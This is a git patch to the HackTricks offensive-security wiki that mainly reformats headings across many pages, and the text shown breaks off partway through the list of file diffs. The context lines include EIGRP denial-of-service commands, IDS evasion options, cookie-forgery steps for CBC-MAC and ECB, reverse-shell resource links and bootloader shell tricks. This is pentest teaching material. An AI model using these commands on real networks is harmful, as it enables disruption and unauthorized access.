From 827e6354daef7c41453760b341e2019f16501441 Mon Sep 17 00:00:00 2001 
From: carlospolop Date: Tue, 8 Jul 2025 13:28:53 +0200 Subject: [PATCH] fix some titles --- src/SUMMARY.md | 3 - .../README.md | 2 + .../blockchain-and-crypto-currencies.md | 2 + .../cipher-block-chaining-cbc-mac-priv.md | 10 +- .../unpacking-binaries.md | 6 +- .../electronic-code-book-ecb.md | 12 ++- .../rc4-encrypt-and-decrypt.md | 2 + src/generic-hacking/reverse-shells/README.md | 12 ++- .../file-integrity-monitoring.md | 8 +- .../README.md | 2 + .../desofuscation-vbs-cscript.exe.md | 2 + .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 2 + .../pentesting-network/dhcpv6.md | 2 + .../pentesting-network/eigrp-attacks.md | 16 ++-- .../pentesting-network/ids-evasion.md | 16 ++-- .../network-protocols-explained-esp.md | 2 + .../pentesting-network/pentesting-ipv6.md | 28 +++--- .../phishing-methodology/clone-a-website.md | 2 + .../python/bruteforce-hash-few-chars.md | 2 + .../firmware-analysis/bootloader-testing.md | 10 +- .../firmware-analysis/firmware-integrity.md | 4 +- ...uthn-docker-access-authorization-plugin.md | 42 ++++---- ...se_agent-exploit-relative-paths-to-pids.md | 4 +- .../sensitive-mounts.md | 6 +- .../privilege-escalation/logstash.md | 2 + .../nfs-no_root_squash-misconfiguration-pe.md | 18 ++-- .../privilege-escalation/selinux.md | 6 +- .../socket-command-injection.md | 2 + .../ssh-forward-agent-exploitation.md | 8 +- .../wildcards-spare-tricks.md | 2 + .../macos-bundles.md | 5 +- .../android-app-pentesting/adb-commands.md | 48 +++++----- .../content-protocol.md | 2 + .../intent-injection.md | 2 + .../make-apk-accept-ca-certificate.md | 6 +- .../manual-deobfuscation.md | 2 + .../react-native-application.md | 8 +- .../spoofing-your-location-in-play-store.md | 2 + .../ios-pentesting/ios-basics.md | 24 ++--- .../ios-hooking-with-objection.md | 22 +++-- .../ios-pentesting/ios-protocol-handlers.md | 5 +- .../ios-serialisation-and-encoding.md | 2 + .../ios-pentesting/ios-uipasteboard.md | 2 + ...0-network-data-management-protocol-ndmp.md | 6 
+- ...-24008-24009-49152-pentesting-glusterfs.md | 4 +- .../3128-pentesting-squid.md | 12 ++- .../3299-pentesting-saprouter.md | 2 + .../3632-pentesting-distcc.md | 10 +- .../3690-pentesting-subversion-svn-server.md | 6 +- ...ntesting-erlang-port-mapper-daemon-epmd.md | 20 ++-- .../44134-pentesting-tiller-helm.md | 8 +- .../44818-ethernetip.md | 8 +- .../47808-udp-bacnet.md | 12 ++- ...060-50070-50075-50090-pentesting-hadoop.md | 4 +- .../515-pentesting-line-printer-daemon-lpd.md | 8 +- .../5601-pentesting-kibana.md | 10 +- .../69-udp-tftp.md | 11 ++- .../7-tcp-udp-pentesting-echo.md | 4 +- .../9000-pentesting-fastcgi.md | 6 +- .../9001-pentesting-hsqldb.md | 20 ++-- src/network-services-pentesting/9100-pjl.md | 12 ++- .../pentesting-264-check-point-firewall-1.md | 6 +- ...ting-631-internet-printing-protocol-ipp.md | 4 +- .../pentesting-compaq-hp-insight-manager.md | 6 +- .../ftp-bounce-download-2oftp-file.md | 4 +- .../harvesting-tickets-from-linux.md | 2 + .../pentesting-modbus.md | 6 +- .../pentesting-sap.md | 20 ++-- .../pentesting-snmp/snmp-rce.md | 4 +- .../aem-adobe-experience-cloud.md | 2 + .../artifactory-hacking-guide.md | 2 + .../pentesting-web/cgi.md | 14 +-- .../pentesting-web/golang.md | 2 + .../disable_functions-bypass-dl-function.md | 2 + ...than-3.3.0-php-greater-than-5.4-exploit.md | 3 +- .../disable_functions-bypass-mod_cgi.md | 3 +- ...p-4-greater-than-4.2.0-php-5-pcntl_exec.md | 3 +- ..._functions-bypass-php-5.2-fopen-exploit.md | 3 +- ...p-5.2.3-win32std-ext-protections-bypass.md | 3 +- ...ons-bypass-php-5.2.4-and-5.2.5-php-curl.md | 3 +- ...s-bypass-php-less-than-5.2.9-on-windows.md | 3 +- ...perl-extension-safe_mode-bypass-exploit.md | 3 +- ...roc_open-and-custom-environment-exploit.md | 4 +- .../disable_functions-bypass-via-mem.md | 4 +- ...ons-php-5.2.4-ioncube-extension-exploit.md | 3 +- ...le_functions-php-5.x-shellshock-exploit.md | 4 +- .../pentesting-web/vmware-esx-vcenter....md | 6 +- ...ypass-self-+-unsafe-inline-with-iframes.md | 6 
+- src/pentesting-web/deserialization/README.md | 2 +- ...ialization-objectinputstream-readobject.md | 6 +- ...ploiting-__viewstate-knowing-the-secret.md | 2 + ...va-jsf-viewstate-.faces-deserialization.md | 2 + .../file-inclusion/lfi2rce-via-phpinfo.md | 2 + .../lfi2rce-via-temp-file-uploads.md | 6 +- .../hacking-with-cookies/cookie-bomb.md | 2 + .../cookie-jar-overflow.md | 2 + src/pentesting-web/idor.md | 2 + .../login-bypass/sql-login-bypass.md | 2 + src/pentesting-web/reverse-tab-nabbing.md | 16 ++-- .../saml-attacks/saml-basics.md | 14 +-- .../big-binary-files-upload-postgresql.md | 6 +- src/pentesting-web/sql-injection/sqlmap.md | 37 ++++---- .../sqlmap/second-order-injection-sqlmap.md | 2 + .../xss-cross-site-scripting/pdf-injection.md | 2 + .../angr/README.md | 30 +++--- .../blobrunner.md | 2 + .../satisfiability-modulo-theories-smt-z3.md | 20 ++-- src/reversing/reversing-tools/README.md | 24 ++--- src/todo/6881-udp-pentesting-bittorrent.md | 6 -- src/todo/burp-suite.md | 4 +- src/todo/interesting-http.md | 10 +- src/todo/misc.md | 2 + src/todo/more-tools.md | 14 +-- src/todo/pentesting-dns.md | 12 --- src/todo/post-exploitation.md | 2 + src/todo/references.md | 95 ------------------- .../ad-information-in-printers.md | 2 + .../active-directory-methodology/dcshadow.md | 5 +- .../dsrm-credentials.md | 4 +- src/windows-hardening/mythic.md | 6 +- .../stealing-credentials/wts-impersonator.md | 2 + ...ectory-permission-over-service-registry.md | 2 + .../create-msi-with-wix.md | 4 +- ...igh-integrity-to-system-with-name-pipes.md | 2 + .../integrity-levels.md | 2 +- .../sedebug-+-seimpersonate-copy-token.md | 3 + .../windows-c-payloads.md | 4 +- 128 files changed, 557 insertions(+), 460 deletions(-) delete mode 100644 src/todo/6881-udp-pentesting-bittorrent.md delete mode 100644 src/todo/pentesting-dns.md delete mode 100644 src/todo/references.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4d3184b5e..a513d96de 100644 --- a/src/SUMMARY.md 
+++ b/src/SUMMARY.md @@ -856,11 +856,9 @@ # ✍️ TODO - [Interesting Http](todo/interesting-http.md) -- [Other Big References](todo/references.md) - [Rust Basics](todo/rust-basics.md) - [More Tools](todo/more-tools.md) - [MISC](todo/misc.md) -- [Pentesting DNS](todo/pentesting-dns.md) - [Hardware Hacking](todo/hardware-hacking/README.md) - [Fault Injection Attacks](todo/hardware-hacking/fault_injection_attacks.md) - [I2C](todo/hardware-hacking/i2c.md) @@ -892,7 +890,6 @@ - [Interesting HTTP$$external:todo/interesting-http.md$$]() - [Android Forensics](todo/android-forensics.md) - [TR-069](todo/tr-069.md) -- [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md) - [Online Platforms with API](todo/online-platforms-with-api.md) - [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md) - [Post Exploitation](todo/post-exploitation.md) diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md index c45957447..7f4c02712 100644 --- a/src/blockchain/blockchain-and-crypto-currencies/README.md +++ b/src/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,3 +1,5 @@ +# Blockchain and Crypto-Currencies + {{#include ../../banners/hacktricks-training.md}} ## Basic Concepts diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md index bc2ade55c..7bdd05ed9 100644 --- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,3 +1,5 @@ +# Blockchain and Crypto Currencies + {{#include ../banners/hacktricks-training.md}} ## Basic Concepts diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 5971c1cda..3368060f0 100644 --- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md 
+++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,10 +1,12 @@ +# Cipher Block Chaining (CBC) and CBC-MAC Privilege Escalation + {{#include ../banners/hacktricks-training.md}} -# CBC +## CBC If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. -# CBC-MAC +## CBC-MAC **Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. @@ -12,7 +14,7 @@ To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero init ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]() -# Vulnerability +## Vulnerability With CBC-MAC usually the **IV used is 0**.\ This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: @@ -42,7 +44,7 @@ now, you can use s32 as the signature of the full name **Administrator**. 2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** 3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. -# Attack Controlling IV +## Attack Controlling IV If you can control the used IV the attack could be very easy.\ If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ 
diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md index 9132f1946..6a1414553 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md +++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md @@ -1,6 +1,8 @@ +# Unpacking Binaries + {{#include ../../banners/hacktricks-training.md}} -# Identifying packed binaries +## Identifying packed binaries - **lack of strings**: It's common to find that packed binaries doesn't have almost any string - A lot of **unused strings**: Also, when a malware is using some kind of commercial packer it's common to find a lot of strings without cross-references. Even if these strings exist that doesn't mean that the binary isn't packed. @@ -9,7 +11,7 @@ - [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml) - [Language 2000](http://farrokhi.net/language/) -# Basic Recommendations +## Basic Recommendations - **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start. - Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it. diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md index c01107bc4..a3731d315 100644 --- a/src/crypto-and-stego/electronic-code-book-ecb.md +++ b/src/crypto-and-stego/electronic-code-book-ecb.md 
@@ -1,6 +1,8 @@ +# Electronic Code Book (ECB) + {{#include ../banners/hacktricks-training.md}} -# ECB +## ECB (ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. @@ -11,7 +13,7 @@ Using ECB has multiple security implications: - **Blocks from encrypted message can be removed** - **Blocks from encrypted message can be moved around** -# Detection of the vulnerability +## Detection of the vulnerability Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ @@ -37,9 +39,9 @@ Now, the attacker just need to discover if the format is `< | 4 | 4 | 8 | 16 | | 7 | 7 | 14 | 16 | -# Exploitation of the vulnerability +## Exploitation of the vulnerability -## Removing entire blocks +### Removing entire blocks Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: @@ -54,7 +56,7 @@ Then, you can remove the first block of 8B and you will et a valid cookie for th \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -## Moving blocks +### Moving blocks In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index b96787d2e..03f094366 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md 
@@ -1,3 +1,5 @@ +# RC4 Encrypt and Decrypt + {{#include ../banners/hacktricks-training.md}} If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md index 248a21a77..cf7900638 100644 --- a/src/generic-hacking/reverse-shells/README.md +++ b/src/generic-hacking/reverse-shells/README.md @@ -1,14 +1,16 @@ +# Reverse Shells + {{#include ../../banners/hacktricks-training.md}} -# [**Shells - Linux**](linux.md) +## [**Shells - Linux**](linux.md) -# [**Shells - Windows**](windows.md) +## [**Shells - Windows**](windows.md) -# [**MSFVenom - CheatSheet**](msfvenom.md) +## [**MSFVenom - CheatSheet**](msfvenom.md) -# [**Full TTYs**](full-ttys.md) +## [**Full TTYs**](full-ttys.md) -# **Auto-generated shells** +## **Auto-generated shells** - [**https://reverse-shell.sh/**](https://reverse-shell.sh/) - [**https://www.revshells.com/**](https://www.revshells.com/) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index a01d62b33..e3924fd0a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md 
@@ -1,20 +1,22 @@ +# File Integrity Monitoring + {{#include ../../banners/hacktricks-training.md}} -# Baseline +## Baseline A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. -## File Integrity Monitoring +### File Integrity Monitoring File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: 1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. 2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. -## Tools +### Tools - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index d23a7ab56..e5e497ee7 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md 
@@ -1,3 +1,5 @@ +# Specific Software/File Type Tricks + {{#include ../../../banners/hacktricks-training.md}} Here you can find interesting tricks for specific file-types and/or software: diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 08b84952d..4023160b1 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,3 +1,5 @@ +# Desobfuscation Techniques for VBS Files + {{#include ../../../banners/hacktricks-training.md}} Some things that could be useful to debug/deobfuscate a malicious VBS file: diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 64726e83d..567751d68 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,3 +1,5 @@ +# PNG Tricks + {{#include ../../../banners/hacktricks-training.md}} **PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 9dde6a953..41f3482bf 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,3 +1,5 @@ +# Video and Audio File Analysis + {{#include ../../../banners/hacktricks-training.md}} **Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 07801a20d..c5b4964eb 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,3 +1,5 @@ +# DHCPv6 + {{#include ../../banners/hacktricks-training.md}} ### DHCPv6 vs. DHCPv4 Message Types Comparison diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 855103ab1..bb64aa796 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md 
@@ -9,9 +9,9 @@ - **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. - **Tool**: **helloflooding.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface, e.g., `eth0`. - `--as`: Defines the EIGRP autonomous system number, e.g., `1`. @@ -22,9 +22,9 @@ - **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. - **Tool**: **routeinject.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 - %%% + ``` - **Parameters**: - `--interface`: Specifies the attacker’s system interface. - `--as`: Defines the EIGRP AS number. @@ -37,9 +37,9 @@ - **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. - **Tool**: **relationshipnightmare.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface. - `--as`: Defines the EIGRP AS number. @@ -50,9 +50,9 @@ - **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. - **Tool**: **routingtableoverflow.py** script. - **Execution**: - %%%bash + ```bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface. - `--as`: Defines the EIGRP AS number. 
diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index c86063da7..0ee5e68bb 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md 
@@ -1,35 +1,37 @@ +# IDS/IPS Evasion Techniques + {{#include ../../banners/hacktricks-training.md}} -# **TTL Manipulation** +## **TTL Manipulation** Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content. **Nmap option:** `--ttlvalue ` -# Avoiding signatures +## Avoiding signatures Just add garbage data to the packets so the IPS/IDS signature is avoided. **Nmap option:** `--data-length 25` -# **Fragmented Packets** +## **Fragmented Packets** Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host. **Nmap option:** `-f` -# **Invalid** _**checksum**_ +## **Invalid** _**checksum**_ Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. -# **Uncommon IP and TCP options** +## **Uncommon IP and TCP options** A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt. -# **Overlapping** +## **Overlapping** It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). 
Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\ Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes. @@ -39,7 +41,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which - **First** (Windows): First value that comes, value that stays. - **Last** (cisco): Last value that comes, value that stays. -# Tools +## Tools - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 5a9ff6dc1..b2c302aa2 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,3 +1,5 @@ +# Network Protocols + {{#include ../../banners/hacktricks-training.md}} ## Multicast DNS (mDNS) diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 75812e427..bede07f64 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -1,8 +1,10 @@ +# Pentesting IPv6 + {{#include ../../banners/hacktricks-training.md}} -# IPv6 Basic theory +## IPv6 Basic theory -## Networks +### Networks IPv6 addresses are structured to enhance network organization and device interaction. An IPv6 address is divided into: 
@@ -40,7 +42,7 @@ alive6 eth0 IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network. -## **Deriving Link-local IPv6 from MAC Address** +### **Deriving Link-local IPv6 from MAC Address** Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows: @@ -48,13 +50,13 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP 2. Prepend `fe80::` and insert `fffe` in the middle: **`fe80::1234:56ff:fe78:9abc`** 3. Invert the seventh bit from the left, changing `1234` to `1034`: **`fe80::1034:56ff:fe78:9abc`** -## **IPv6 Address Types** +### **IPv6 Address Types** - **Unique Local Address (ULA)**: For local communications, not meant for public internet routing. Prefix: **`FEC00::/7`** - **Multicast Address**: For one-to-many communication. Delivered to all interfaces in the multicast group. Prefix: **`FF00::/8`** - **Anycast Address**: For one-to-nearest communication. Sent to the closest interface as per routing protocol. Part of the **`2000::/3`** global unicast range. -## **Address Prefixes** +### **Address Prefixes** - **fe80::/10**: Link-Local addresses (similar to 169.254.x.x) - **fc00::/7**: Unique Local-Unicast (similar to private IPv4 ranges like 10.x.x.x, 172.16.x.x, 192.168.x.x) 
@@ -62,14 +64,14 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP - **ff02::1**: Multicast All Nodes - **ff02::2**: Multicast Router Nodes -## **Discovering IPv6 Addresses within a Network** +### **Discovering IPv6 Addresses within a Network** -### Way 1: Using Link-local Addresses +#### Way 1: Using Link-local Addresses 1. Obtain the MAC address of a device within the network. 2. Derive the Link-local IPv6 address from the MAC address. -### Way 2: Using Multicast +#### Way 2: Using Multicast 1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network. @@ -79,7 +81,7 @@ ping6 -I ff02::1 # Send a ping to multicast address ip -6 neigh # Display the neighbor table ``` -## IPv6 Man-in-the-Middle (MitM) Attacks +### IPv6 Man-in-the-Middle (MitM) Attacks Several techniques exist for executing MitM attacks in IPv6 networks, such as: @@ -88,9 +90,9 @@ Several techniques exist for executing MitM attacks in IPv6 networks, such as: - Attacking mobile IPv6 (usually requires IPSec to be disabled). - Setting up a rogue DHCPv6 server. -# Identifying IPv6 Addresses in the eild +## Identifying IPv6 Addresses in the eild -## Exploring Subdomains +### Exploring Subdomains A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google: @@ -98,7 +100,7 @@ A method to find subdomains that are potentially linked to IPv6 addresses involv site:ipv6./ ``` -## Utilizing DNS Queries +### Utilizing DNS Queries To identify IPv6 addresses, certain DNS record types can be queried: 
@@ -106,7 +108,7 @@ To identify IPv6 addresses, certain DNS record types can be queried: - **AAAA**: Directly seeks out IPv6 addresses. - **ANY**: A broad query that returns all available DNS records. -## Probing with Ping6 +### Probing with Ping6 After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices. diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index 2150ed64e..b0b64c916 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -1,3 +1,5 @@ +# Cloning a Website + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md index b14f18f07..6b983a935 100644 --- a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md @@ -1,3 +1,5 @@ +# Bruteforce Hash Few Chars + {{#include ../../banners/hacktricks-training.md}} ```python diff --git a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md index 04c704023..78b21d495 100644 --- a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md +++ b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md @@ -1,3 +1,5 @@ +# Bootloader Testing + {{#include ../../banners/hacktricks-training.md}} The following steps are recommended for modifying device startup configurations and bootloaders like U-boot: 
@@ -9,24 +11,24 @@ The following steps are recommended for modifying device startup configurations 2. **Modify Boot Arguments**: - Execute the following commands to append '`init=/bin/sh`' to the boot arguments, allowing execution of a shell command: - %%% + ``` #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot - %%% + ``` 3. **Setup TFTP Server**: - Configure a TFTP server to load images over a local network: - %%% + ``` #setenv ipaddr 192.168.2.2 #local IP of the device #setenv serverip 192.168.2.1 #TFTP server IP #saveenv #reset #ping 192.168.2.1 #check network access #tftp ${loadaddr} uImage-3.6.35 #loadaddr takes the address to load the file into and the filename of the image on the TFTP server - %%% + ``` 4. **Utilize `ubootwrite.py`**: diff --git a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md index f91b17398..a74d069b8 100644 --- a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md +++ b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md @@ -1,6 +1,6 @@ -{{#include ../../banners/hacktricks-training.md}} +# Firmware Integrity -## Firmware Integrity +{{#include ../../banners/hacktricks-training.md}} The **custom firmware and/or compiled binaries can be uploaded to exploit integrity or signature verification flaws**. The following steps can be followed for backdoor bind shell compilation: diff --git a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 8cea7bebe..6d79db9cb 100644 --- 